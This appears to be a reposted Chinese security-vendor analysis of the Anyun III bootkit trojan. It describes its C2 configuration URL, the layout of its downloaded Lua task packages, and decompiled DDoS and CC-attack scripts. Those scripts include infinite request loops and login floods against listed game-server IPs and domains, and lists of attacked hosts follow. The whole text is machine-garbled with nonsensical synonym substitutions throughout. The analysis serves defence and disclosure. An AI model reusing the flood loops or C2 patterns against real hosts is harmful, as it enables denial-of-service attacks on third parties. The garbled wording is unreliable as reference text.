腾讯御平安深度剖析暗云Ⅲ

【关键词:腾讯御平安,APK破绽扫描,APP庇护,Android防破解】

前面临暗云的剖析报告中,腾讯电脑管家平安团队和腾讯御平安基础摸清暗云Ⅲ的感染体式格局和流传体式格局,也定位到被感染暗云Ⅲ的机械会在启动时从效劳端下载使命剧本包——ndn.db文件,且该文件会常举行替换。另外,撰写本文的同时,腾讯御平安也收集到多个差别功用的ndn.db文件,以下腾讯御平安将对暗云Ⅲ伤害睁开详细剖析。

0x01 暗云payload行动剖析
在剖析db文件前,先过一次暗云payload行动:

木马每5分钟会联网下载一次设置文件 http://www.acsewle.com:8877/ds/kn.html

该html是个设置文件,木马会搜检个中的版本号,并保留,厥后每次都邑比较,以肯定是不是更新。

如果有更新,则下载新版本,并依据设置下载文件实行或许建立svchost.exe傀儡历程实行。

木马干活模块lcdn.db其实为lua剧本剖析器,重要功用下载使命db,进而剖析实行:

0x02 使命剧本文件组织

经由过程剖析,得知ndn.db的文件组织,大抵以下:
struct f_db{
DWORD fileLen; // lua剧本bytecode文件大小

DWORD runType; // 运转范例
char fileName[24]; // lua剧本文件名
char fileData[fileLen]; // lua剧本bytecode内容

}
以下图中,赤色框为文件大小,灰色框为运转范例,蓝色框为文件名,紫色框为实在的bytecode内容。

依据文件组织,进而可从ndn.db中提取到多个lua剧本的bytecode。

0x03 使命剧本功用分类
剖析得知,其运用的lua版本为5.3,是自行更悛改虚拟机举行编译。运用一般反编译东西反编译后,只能获得部份可读明文,经由剖析统计可晓得暗云Ⅲ现有宣布的功用大抵有以下几类:
1、统计类
解密获得的111tj.lua剧本,实则为介入进击机械统计剧本。

该剧本重要作用为:每隔五分钟,带Referer:http://www.acsewle.com:8877/um.php接见cnzz和51.la两个站点统计页面,以便统计介入进击的机械数及次数。
统计页面地点为:
http://c.cnzz.com/wapstat.php…
http://web.users.51.la/go.asp…
接见流量:

2、DDoS类
  这类剧本,简朴粗犷,直接do、while轮回,不停地对目的效劳提议接见。以下为dfh01.lua中代码,其目的是针对大富豪棋牌游戏。
L1_1.get = L4_4
L4_4 = {
“182.86.84.236”,
“119.167.151.218”,
“27.221.30.113”,
“119.188.96.111”,
“113.105.245.107”
}
while true do
url = “http://” .. “web.168dfh.biz” .. “/”
L1_1.get(url)
url = “http://” .. “web.168dfh.cn” .. “/”
L1_1.get(url)
url = “http://” .. “web.168dfh.top” .. “/”
L1_1.get(url)
end
  又如,dfhcdn01.lua中:
while true do
sendlogin(“114.215.184.159”, 8002)
sendlogin(“114.215.169.190”, 8005)
sendlogin(“114.215.169.97”, 8002)
sendlogin(“121.41.91.65”, 8005)
sendlogin(“123.56.152.5”, 8000)
sendlogin(“121.199.2.34”, 8002)
sendlogin(“121.199.6.149”, 8000)
sendlogin(“121.199.15.237”, 8002)
sendlogin(“101.200.223.210”, 17000)
sendlogin(“121.199.14.117”, 8002)
sendlogin(“112.125.120.141”, 9000)
sendlogin(“123.57.32.93”, 9000)
end
  再如,在new59303.lua中:

3、CC进击类
  解密获得的yiwanm001.lua剧本中,包括有各种UserAgent,在提议进击时,会随机运用这些UserAgent来对目的网站提议接见,另外该剧本还将监测是不是跳转到验证码页面,并自动提取Cookie完成接见。
  随机UA:

猎取Cookie:

这个剧本进击的目的为m.yiwan.com。为了准确到指定目的,剧本中还写死了两个效劳器ip。
L6_6= “http://139.199.135.131:80/”
L7_7= “http://118.89.206.177:80/”
进击流量截图:

又如,进击剧本jjhm77.lua剧本中,从http://down.jjhgame.com/ip.tx…

以后根据目的效劳所需的特定花样组织随机数据:

轮回发送,最先进击:

0x04 伤害及发起
  暗云自带lua剧本剖析器,进击全程文件不落地,详细需实行使命的db文件也是随时在效劳端更新宣布,云云增大了杀软查杀难度。坐拥上百万的暗云掌握端(数据来自:CNCERT[http://www.cert.org.cn/publis…]),已能够不需要肉鸡无间断提议衔接,即可完成大规模的指向性进击。云云的优点就是在用户无感的状况下,占用用户带宽,完成进击。
  到目前为止,腾讯反病毒实验室发明的暗云进击目的大多为各种棋牌、游戏效劳器。停止当前,暗云掌握端url已自行剖析到127.0.0.1,下发url也已失效。但不肯定暗云下一次开启时,使命db文件中lua剧本不会是越发歹意的功用。
  所以,腾讯电脑管家发起用户主动采用平安提防措施:
  1、不要挑选装置绑缚在下载器中的软件,不要运转来源不明或被平安软件报警的顺序,不要下载运转游戏外挂、私服登录器等软件;
  2、按期在差别的存储介质上备份信息系统营业和个人数据。
  3、下载腾讯电脑管家举行“暗云”木马顺序检测和查杀;
0x05 附录(暗云进击过的ip地点及URL)
汗青进击过的IP列表:
114.64.222.26
103.254.188.247
114.64.222.27
60.5.254.82
60.5.254.81
60.5.254.47
218.29.50.40
218.29.50.39
60.221.254.229
60.221.254.230
122.143.27.170
182.106.194.83
27.155.73.17
27.155.73.16
125.89.198.29
182.106.194.84
111.47.220.47
111.47.220.46
111.20.250.133
123.128.14.174
106.59.99.46
116.55.236.92
218.5.238.249
106.59.99.47
117.27.241.114
117.27.241.181
14.215.100.76
113.12.84.24
113.12.84.23
14.215.100.75
112.90.213.51
112.90.213.52
58.223.166.19
122.5.53.120
122.5.53.121
58.51.150.40
219.146.68.119
114.80.230.238
114.80.143.223
114.80.230.237
112.25.83.28
120.221.25.169
120.221.24.125
117.148.163.80
112.25.83.29
120.221.24.126
117.148.163.79
182.140.142.40
118.123.97.16
118.123.97.17
220.165.142.221
182.140.142.39
218.76.109.67
222.243.110.83
222.243.110.82
120.221.25.170
113.5.80.249
218.60.109.79
113.5.80.248
218.60.109.80
58.51.150.52
122.246.17.9
120.199.86.132
122.228.30.147
122.228.30.38
122.228.11.175
116.211.144.70
218.11.0.9
118.178.213.63
116.211.168.169
116.31.100.147
116.31.100.3
116.31.100.144
116.31.100.148
116.31.100.170
122.246.17.15
116.211.144.240
116.211.144.129
116.211.144.242
116.211.144.206
116.211.144.238
116.211.144.239
116.211.144.219
114.215.184.159
114.215.169.190
114.215.169.97
121.41.91.65
123.56.152.5
121.199.2.34
121.199.6.149
121.199.15.237
101.200.223.210
121.199.14.117
112.125.120.141
123.57.32.93
182.86.84.236
119.167.151.218
27.221.30.113
119.188.96.111
113.105.245.107
139.224.32.159
139.224.68.202
139.224.35.106
139.196.252.62
139.224.35.175
139.196.252.245
139.224.33.199
139.224.68.48
139.224.35.132
139.196.252.61
139.224.35.188
139.199.135.131
118.89.206.177
汗青进击过的URL列表:
http://senios.138kkk.com
http://senand.138kkk.com
http://m.yiwan.com
http://oss.aliyuncs.com/uu919…
http://oss.aliyuncs.com/uu919…
http://senres.138kkk.com/sen/…
http://senres.138kkk.com/sen/…
http://58.51.150.52/sso/ios/f…
http://ssores.u2n0.com/sso/io…
http://pcupdate.game593.com/?…
http://senios.uts7.com
http://senand.uts7.com
http://139.199.135.131:80
http://118.89.206.177:80
0x06 参考文档
[1] 暗云Ⅲ BootKit 木马剖析:http://www.freebuf.com/articl…
[2] 暗云Ⅲ木马流传感染剖析:http://www.freebuf.com/articl…
[3] 哈尔滨工业大学关于提防暗云木马的关照:http://www.80sd.org/guonei/20…
[4] CNCERT关于“暗云”木马顺序有关状况通:http://www.cert.org.cn/publis…

关于腾讯平安实验室

腾讯挪动平安实验室:基于腾讯手机管家产物效劳,经由过程终端平安平台、网络平安平台和硬件平安平台为挪动产业打造云管端全方位的平安解决方案。个中腾讯御平安专注于为个人和企业挪动运用开发者,供应周全的运用平安效劳。

腾讯平安反欺骗实验室:会聚国际最顶尖白帽黑客和多位腾讯专家级大数据人材,专注反欺骗手艺和平安攻防系统研讨。反欺骗实验室具有环球最大平安云数据库并效劳99%中国网民。

    原文作者:YAQ御安全
    原文地址: https://segmentfault.com/a/1190000013539878
    本文转自网络文章,转载此文章仅为分享知识,如有侵权,请联系博主进行删除。
点赞